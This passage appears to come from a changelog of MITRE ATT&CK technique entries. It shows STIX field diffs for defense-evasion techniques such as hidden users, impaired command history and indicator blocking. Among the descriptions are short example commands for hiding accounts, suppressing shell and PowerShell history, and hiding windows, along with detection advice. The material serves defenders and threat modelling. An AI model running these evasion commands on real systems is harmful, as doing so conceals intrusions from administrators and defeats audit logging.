June 2021)(Citation: US-CERT TA18-074A) |
Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value Hide500Users to TRUE in the /Library/Preferences/com.apple.loginwindow plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the Hide500Users key value is set to TRUE, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the dscl utility to create hidden user accounts by setting the IsHidden attribute to 1. Adversaries can also hide a user’s home folder by changing the chflags to hidden.(Citation: Apple Support Hide a User Account)
Adversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)
On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the gsettings command (ex: sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['root', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:22:03.625000+00:00 | 2022-04-19 02:31:01.315000+00:00 |
| description | Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.
In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)
In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A) |
Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value Hide500Users to TRUE in the /Library/Preferences/com.apple.loginwindow plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the Hide500Users key value is set to TRUE, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the dscl utility to create hidden user accounts by setting the IsHidden attribute to 1. Adversaries can also hide a user’s home folder by changing the chflags to hidden.(Citation: Apple Support Hide a User Account)
Adversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)
On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the gsettings command (ex: sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary. |
| external_references[1]['description'] | Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020. | Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021. |
| external_references[1]['url'] | http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf | https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf |
| external_references[2]['source_name'] | FireEye SMOKEDHAM June 2021 | Apple Support Hide a User Account |
| external_references[2]['description'] | FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. | Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html | https://support.apple.com/en-us/HT203998 |
| external_references[3]['source_name'] | US-CERT TA18-074A | FireEye SMOKEDHAM June 2021 |
| external_references[3]['description'] | US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. | FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. |
| external_references[3]['url'] | https://www.us-cert.gov/ncas/alerts/TA18-074A | https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html |
| x_mitre_data_sources[0] | Command: Command Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | Command: Command Execution |
| x_mitre_data_sources[2] | Process: Process Creation | User Account: User Account Metadata |
| x_mitre_data_sources[4] | User Account: User Account Metadata | File: File Modification |
| x_mitre_data_sources[5] | File: File Modification | Process: Process Creation |
| x_mitre_detection | This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, "hidden" users may still get a home directory and will appear in the authentication logs.
Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList key. |
Monitor for users that may be hidden from the login screen but still present in additional artifacts of usage such as directories and authentication logs.
Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList key.
In macOS, monitor for commands, processes, and file activity in combination with a user that has a userID under 500.(Citation: Cybereason OSX Pirrit) Monitor for modifications to set the Hide500Users key value to TRUE in the /Library/Preferences/com.apple.loginwindow plist file. Monitor the command line for usage of the dscl . create command with the IsHidden attribute set to 1.(Citation: Apple Support Hide a User Account) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Hide GDM User Accounts', 'description': 'Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.', 'url': 'https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/'} | |
| external_references | {'source_name': 'US-CERT TA18-074A', 'description': 'US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-074A'} | |
| x_mitre_platforms | Linux |
| Description |
|---|
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 22:49:43.557000+00:00 | 2022-03-15 21:09:43.489000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_platforms | Linux |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Description |
|---|
| Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015) Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20 19:01:56.752000+00:00 | 2022-03-25 15:59:09.632000+00:00 |
| external_references[2]['description'] | Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020. | Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021. |
| external_references[2]['url'] | http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf | https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Creation |
| x_mitre_data_sources[1] | File: File Creation | File: File Metadata |
| x_mitre_data_sources[2] | Application Log: Application Log Content | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[4] | File: File Metadata | Application Log: Application Log Content |
| x_mitre_data_sources[5] | User Account: User Account Creation | Script: Script Execution |
| x_mitre_data_sources[6] | User Account: User Account Metadata | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[7] | File: File Modification | Firmware: Firmware Modification |
| x_mitre_data_sources[8] | Script: Script Execution | Process: OS API Execution |
| x_mitre_data_sources[9] | Process: OS API Execution | User Account: User Account Creation |
| x_mitre_data_sources[10] | Windows Registry: Windows Registry Key Modification | User Account: User Account Metadata |
| x_mitre_data_sources[11] | Firmware: Firmware Modification | File: File Modification |
| Description |
|---|
| Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 23:52:52.536000+00:00 | 2022-05-05 04:07:01.191000+00:00 |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Service: Service Metadata |
| x_mitre_data_sources[1] | Process: Process Creation | File: File Modification |
| x_mitre_data_sources[3] | Command: Command Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[4] | Service: Service Metadata | Process: Process Creation |
| x_mitre_data_sources[6] | File: File Modification | Command: Command Execution |
| x_mitre_defense_bypassed[1] | Application control | Application Control |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. | |
| external_references | CAPEC-13 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-13 | |
| external_references | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-24 13:59:12.787000+00:00 | 2022-09-01 20:48:29.785000+00:00 |
| description | Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging). |
| external_references[1]['source_name'] | capec | Sophos PowerShell command audit |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/13.html | https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit |
| external_references[3]['source_name'] | Sophos PowerShell command audit | Sophos PowerShell Command History Forensics |
| external_references[3]['description'] | jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. |
| external_references[3]['url'] | https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics |
| external_references[4]['source_name'] | Sophos PowerShell Command History Forensics | capec |
| external_references[4]['url'] | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics | https://capec.mitre.org/data/definitions/13.html |
| x_mitre_detection | Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. |
Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to clear or disable historical log data with built-in features native to the network device platform. Monitor such command activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations. |
| x_mitre_version | 2.0 | 2.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_platforms | Network |
| Description |
|---|
| Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 13:37:31.463000+00:00 | 2022-10-19 16:32:56.502000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | Cloud Service: Cloud Service Modification |
| x_mitre_data_sources[1] | Process: Process Termination | Firewall: Firewall Rule Modification |
| x_mitre_data_sources[2] | Windows Registry: Windows Registry Key Modification | Process: Process Termination |
| x_mitre_data_sources[3] | Windows Registry: Windows Registry Key Deletion | Service: Service Metadata |
| x_mitre_data_sources[4] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[5] | Service: Service Metadata | Driver: Driver Load |
| x_mitre_data_sources[6] | Sensor Health: Host Status | Firewall: Firewall Disable |
| x_mitre_data_sources[7] | Script: Script Execution | Command: Command Execution |
| x_mitre_data_sources[8] | Firewall: Firewall Disable | Cloud Service: Cloud Service Disable |
| x_mitre_data_sources[9] | Firewall: Firewall Rule Modification | Windows Registry: Windows Registry Key Deletion |
| x_mitre_data_sources[10] | Cloud Service: Cloud Service Modification | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[11] | Cloud Service: Cloud Service Disable | Sensor Health: Host Status |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Script: Script Execution |
| Old Description | New Description |
|---|---|
| Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) | Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-12 18:28:27.948000+00:00 | 2022-03-08 21:27:49.094000+00:00 |
| description | Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) | Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) |
| x_mitre_version | 2.0 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Image: Image Metadata |
| Old Description | New Description |
|---|---|
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. |
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
